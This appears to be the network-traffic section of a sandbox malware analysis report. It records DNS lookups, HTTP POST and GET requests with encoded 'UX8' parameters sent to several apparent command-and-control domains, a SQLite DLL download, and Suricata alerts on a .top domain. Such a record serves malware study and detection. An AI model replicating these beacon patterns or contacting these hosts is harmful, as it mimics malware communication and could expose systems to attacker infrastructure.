Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
www.zocalo-fuk.com | 157.7.107.37 | |
www.exporationgenius.sbs | 104.21.57.28 | |
www.loangoatworld.com | CNAME loangoatworld.com, 3.33.130.190 | |
www.miquwawa.com | CNAME miquwawa.com, 95.169.27.235 | |
www.noghteyab.com | 46.105.190.248 | |
www.sqlite.org | 45.33.6.223 | |
www.tcfreal.top | 203.161.50.128 | |
- TCP Requests
  - 192.168.56.101:49180 -> 104.21.57.28:80 www.exporationgenius.sbs
  - 192.168.56.101:49181 -> 104.21.57.28:80 www.exporationgenius.sbs
  - 192.168.56.101:49182 -> 157.7.107.37:80 www.zocalo-fuk.com
  - 192.168.56.101:49183 -> 157.7.107.37:80 www.zocalo-fuk.com
  - 192.168.56.101:49184 -> 203.161.50.128:80 www.tcfreal.top
  - 192.168.56.101:49185 -> 203.161.50.128:80 www.tcfreal.top
  - 192.168.56.101:49188 -> 3.33.130.190:80 www.loangoatworld.com
  - 192.168.56.101:49189 -> 3.33.130.190:80 www.loangoatworld.com
  - 192.168.56.101:49175 -> 45.33.6.223:80 www.sqlite.org
  - 192.168.56.101:49186 -> 51.89.93.193:80 www.noghteyab.com
  - 192.168.56.101:49187 -> 51.89.93.193:80 www.noghteyab.com
  - 192.168.56.101:49173 -> 95.169.27.235:80 www.miquwawa.com
  - 192.168.56.101:49174 -> 95.169.27.235:80 www.miquwawa.com
- UDP Requests
  - 192.168.56.101:53004 -> 164.124.101.2:53
  - 192.168.56.101:53850 -> 164.124.101.2:53
  - 192.168.56.101:54148 -> 164.124.101.2:53
  - 192.168.56.101:54883 -> 164.124.101.2:53
  - 192.168.56.101:55146 -> 164.124.101.2:53
  - 192.168.56.101:59002 -> 164.124.101.2:53
  - 192.168.56.101:61950 -> 164.124.101.2:53
  - 192.168.56.101:137 -> 192.168.56.255:137
  - 192.168.56.101:54151 -> 239.255.255.250:1900
  - 192.168.56.103:137 -> 192.168.56.101:137
POST 404 http://www.miquwawa.com/tqql/

REQUEST
POST /tqql/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 192
Cache-Control: no-cache
Connection: close
Host: www.miquwawa.com
Origin: http://www.miquwawa.com
Referer: http://www.miquwawa.com/tqql/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

RESPONSE
HTTP/1.1 404 Not Found
x-dns-prefetch-control: on
x-litespeed-tag: 2a1_HTTP.404
expires: Wed, 11 Jan 1984 05:00:00 GMT
content-type: text/html; charset=UTF-8
link: <https://miquwawa.com/wp-json/>; rel="https://api.w.org/"
x-litespeed-cache-control: no-cache
cache-control: no-cache, no-store, must-revalidate, max-age=0
content-encoding: gzip
vary: Accept-Encoding
content-length: 24554
date: Mon, 29 Jul 2024 04:19:21 GMT
server: LiteSpeed
connection: close
GET 301 http://www.miquwawa.com/tqql/?UX8=u0XZF227Y/r9f3hnjIOG+jjSMjDg7zLaE5MpTM9c21roNqnsj5Giqo9JdiKVg3NN2RVqT0KrdJuiKB8prP8iYWfx9j8cghYBBFjwmC7Tnk8aYBcBXjkKDK2u4+7cSJR9pJqJ93M=&_e=jxcPGi4BG

REQUEST
GET /tqql/?UX8=u0XZF227Y/r9f3hnjIOG+jjSMjDg7zLaE5MpTM9c21roNqnsj5Giqo9JdiKVg3NN2RVqT0KrdJuiKB8prP8iYWfx9j8cghYBBFjwmC7Tnk8aYBcBXjkKDK2u4+7cSJR9pJqJ93M=&_e=jxcPGi4BG HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.miquwawa.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

RESPONSE
HTTP/1.1 301 Moved Permanently
x-dns-prefetch-control: on
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
content-type: text/html; charset=UTF-8
x-redirect-by: WordPress
location: http://miquwawa.com/tqql/?UX8=u0XZF227Y/r9f3hnjIOG+jjSMjDg7zLaE5MpTM9c21roNqnsj5Giqo9JdiKVg3NN2RVqT0KrdJuiKB8prP8iYWfx9j8cghYBBFjwmC7Tnk8aYBcBXjkKDK2u4+7cSJR9pJqJ93M=&_e=jxcPGi4BG
x-litespeed-cache-control: public,max-age=3600
x-litespeed-tag: 2a1_HTTP.404,2a1_HTTP.301,2a1_404,2a1_URL.8568d83147aefeb65884e25abb290c35,2a1_guest,2a1_
x-litespeed-cache: miss
content-length: 0
date: Mon, 29 Jul 2024 04:19:23 GMT
server: LiteSpeed
connection: close
GET 200 http://www.sqlite.org/2017/sqlite-dll-win32-x86-3160000.zip

REQUEST
GET /2017/sqlite-dll-win32-x86-3160000.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Host: www.sqlite.org
Connection: Keep-Alive
Cache-Control: no-cache

RESPONSE
HTTP/1.1 200 OK
Connection: keep-alive
Date: Mon, 29 Jul 2024 04:19:25 GMT
Last-Modified: Mon, 02 Jan 2017 21:10:17 GMT
Cache-Control: max-age=120
ETag: "m586ac1b9s6b84e"
Content-type: application/zip; charset=utf-8
Content-length: 440398
POST 404 http://www.exporationgenius.sbs/x06k/

REQUEST
POST /x06k/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 204
Cache-Control: no-cache
Connection: close
Host: www.exporationgenius.sbs
Origin: http://www.exporationgenius.sbs
Referer: http://www.exporationgenius.sbs/x06k/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

RESPONSE
HTTP/1.1 404 Not Found
Date: Mon, 29 Jul 2024 04:19:44 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7HK6H52N0s%2FxT7ybGj3wyoYjIyKtMzJ9AQh%2B6toSO3BXWmukEmSrQ49ImioA%2BwPAghXT971ZlRpCS17siONvAzVIqOy5Uzf3c6Dym1Bhawd0KT%2BIdAt8YMmLyDh6zCn2KsR%2BCxWsc0cD2uk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8aaa4ff8c8b32f41-LAX
Content-Encoding: gzip
alt-svc: h2=":443"; ma=60
GET 404 http://www.exporationgenius.sbs/x06k/?UX8=T/qtMR3LKa4LTbjxJENTE1gbHfbcMoDNkQwOkzuXYGM8AEnHwE1BoCD8ihzw/kVeeFO4GyYqoWqmFjylDbVKWJ6wgOd2jmN6i9pg74XS81AjK7oOmIcxjkpvsNU18Pzzy/zqp1g=&_e=jxcPGi4BG

REQUEST
GET /x06k/?UX8=T/qtMR3LKa4LTbjxJENTE1gbHfbcMoDNkQwOkzuXYGM8AEnHwE1BoCD8ihzw/kVeeFO4GyYqoWqmFjylDbVKWJ6wgOd2jmN6i9pg74XS81AjK7oOmIcxjkpvsNU18Pzzy/zqp1g=&_e=jxcPGi4BG HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.exporationgenius.sbs
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

RESPONSE
HTTP/1.1 404 Not Found
Date: Mon, 29 Jul 2024 04:19:47 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BI%2BW6wIi%2FC36OfpFPzPK5be%2BoBPxVaCu39XHBzK7O8crQPlhmIK9faGA%2FSW%2BZuOjTokK%2FfFmIzeH4uYYc%2BWgtexzD53Obab9GrIMQ3ZHb3UecVUhSFlPA%2FXah7R2m%2Fg%2BgjNgtFohivlJD%2Bo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8aaa5009890a2f4d-LAX
alt-svc: h2=":443"; ma=60
POST 404 http://www.zocalo-fuk.com/iczo/

REQUEST
POST /iczo/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 204
Cache-Control: no-cache
Connection: close
Host: www.zocalo-fuk.com
Origin: http://www.zocalo-fuk.com
Referer: http://www.zocalo-fuk.com/iczo/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

RESPONSE
HTTP/1.1 404 Not Found
Date: Mon, 29 Jul 2024 04:19:52 GMT
Content-Type: text/html
Content-Length: 19268
Connection: close
Server: Apache
Last-Modified: Fri, 27 Oct 2023 06:26:05 GMT
Accept-Ranges: bytes
GET 404 http://www.zocalo-fuk.com/iczo/?UX8=JY7jtaSJ5x5vzidnjWySlw1C0GfgB4v3ywH460gVL7Ewt7sZ57bbwI6mxyJFGNyl5vwWXeVDvThdvQiyRvynE/Zjj7HkpiyOTqmD4v0kKDcwzqr276eGi6TkYHYmx5vmFqXXwms=&_e=jxcPGi4BG

REQUEST
GET /iczo/?UX8=JY7jtaSJ5x5vzidnjWySlw1C0GfgB4v3ywH460gVL7Ewt7sZ57bbwI6mxyJFGNyl5vwWXeVDvThdvQiyRvynE/Zjj7HkpiyOTqmD4v0kKDcwzqr276eGi6TkYHYmx5vmFqXXwms=&_e=jxcPGi4BG HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.zocalo-fuk.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

RESPONSE
HTTP/1.1 404 Not Found
Date: Mon, 29 Jul 2024 04:19:54 GMT
Content-Type: text/html
Content-Length: 19268
Connection: close
Server: Apache
Last-Modified: Fri, 27 Oct 2023 06:26:05 GMT
POST 404 http://www.tcfreal.top/sg27/

REQUEST
POST /sg27/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 204
Cache-Control: no-cache
Connection: close
Host: www.tcfreal.top
Origin: http://www.tcfreal.top
Referer: http://www.tcfreal.top/sg27/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

RESPONSE
HTTP/1.1 404 Not Found
Date: Mon, 29 Jul 2024 04:20:00 GMT
Server: Apache
Content-Length: 11834
Connection: close
Content-Type: text/html
GET 404 http://www.tcfreal.top/sg27/?UX8=cpYt0YSQq6qumPKkPw6QLfXM1KObFctjUwEln5zritMpGV/+kM1tCQF1oqocoz5p4KbVgOmLQvtuRCfM7FFF+QE7cX+gmvJNP2ErFAfMZUG54lXQ6wu+5V3NDlvvWDRsBB/6vdY=&_e=jxcPGi4BG

REQUEST
GET /sg27/?UX8=cpYt0YSQq6qumPKkPw6QLfXM1KObFctjUwEln5zritMpGV/+kM1tCQF1oqocoz5p4KbVgOmLQvtuRCfM7FFF+QE7cX+gmvJNP2ErFAfMZUG54lXQ6wu+5V3NDlvvWDRsBB/6vdY=&_e=jxcPGi4BG HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.tcfreal.top
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

RESPONSE
HTTP/1.1 404 Not Found
Date: Mon, 29 Jul 2024 04:20:03 GMT
Server: Apache
Content-Length: 11834
Connection: close
Content-Type: text/html; charset=utf-8
POST 200 http://www.noghteyab.com/f97t/

REQUEST
POST /f97t/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 204
Cache-Control: no-cache
Connection: close
Host: www.noghteyab.com
Origin: http://www.noghteyab.com
Referer: http://www.noghteyab.com/f97t/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

RESPONSE
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 29 Jul 2024 04:20:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=j7vrfg2qitefkmbu6d7a3pnmb2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Encoding: gzip
GET 200 http://www.noghteyab.com/f97t/?UX8=hkoMjg324npAs1ZBeZ8TzD/yod4wthTGeTvgOqr4Vk4zrcx6pPdRyFEwEDn18B/c37XIJfunev42iw6n9kOhHfgC7TNK8DtkFlqbOeckPp33fVEaTkv/0VMweSZvG65qVo/UWng=&_e=jxcPGi4BG

REQUEST
GET /f97t/?UX8=hkoMjg324npAs1ZBeZ8TzD/yod4wthTGeTvgOqr4Vk4zrcx6pPdRyFEwEDn18B/c37XIJfunev42iw6n9kOhHfgC7TNK8DtkFlqbOeckPp33fVEaTkv/0VMweSZvG65qVo/UWng=&_e=jxcPGi4BG HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.noghteyab.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

RESPONSE
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 29 Jul 2024 04:20:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=g2dk0dg59bjs1epblgm86824n2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
POST 0 http://www.loangoatworld.com/8y3s/

REQUEST
POST /8y3s/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 204
Cache-Control: no-cache
Connection: close
Host: www.loangoatworld.com
Origin: http://www.loangoatworld.com
Referer: http://www.loangoatworld.com/8y3s/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

RESPONSE
(no response recorded; status 0)
GET 200 http://www.loangoatworld.com/8y3s/?UX8=m+e1HwtEOOeM4G5NTLK68Gp6Kwp+MY7uBR7SzEsfX5sQt5Y/60pxYxuDgYg2mwpPnMRTzCuNJ1kKNM0TTa/Wnuj7pyZLvslRvIdrySy2NFkwbRUK0Niqet6rEb5EadRpffeEIOc=&_e=jxcPGi4BG

REQUEST
GET /8y3s/?UX8=m+e1HwtEOOeM4G5NTLK68Gp6Kwp+MY7uBR7SzEsfX5sQt5Y/60pxYxuDgYg2mwpPnMRTzCuNJ1kKNM0TTa/Wnuj7pyZLvslRvIdrySy2NFkwbRUK0Niqet6rEb5EadRpffeEIOc=&_e=jxcPGi4BG HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.loangoatworld.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

RESPONSE
HTTP/1.1 200 OK
Server: openresty
Date: Mon, 29 Jul 2024 04:20:20 GMT
Content-Type: text/html
Content-Length: 268
Connection: close
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
UDP 192.168.56.101:53850 -> 164.124.101.2:53 | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | Potentially Bad Traffic |
TCP 192.168.56.101:49184 -> 203.161.50.128:80 | 2023882 | ET INFO HTTP Request to a *.top domain | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts